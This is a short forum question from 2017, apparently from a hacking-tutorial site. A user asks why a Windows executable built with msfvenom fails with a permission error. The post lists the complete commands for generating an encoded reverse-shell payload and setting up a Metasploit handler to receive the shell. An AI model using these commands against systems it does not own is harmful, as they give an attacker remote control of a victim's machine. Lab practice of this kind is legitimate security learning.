Msfvenom Windows/Meterpreter/reverse_tcp Payload Wont Execute on Windows Because I Don't Have Permission?

Apr 28, 2017 05:27 PM

I made a payload with msfvenom and when i try to execute the .exe file on windows it says i don't have permission. Anyone know how to fix this?

What i used in terminal:

root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reversetcp LHOST=192.168.0.21 LPORT=4444 -b "\x00" -e x86/shikataga_nai -f exe -o /tmp/1.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.21

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > exploit

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!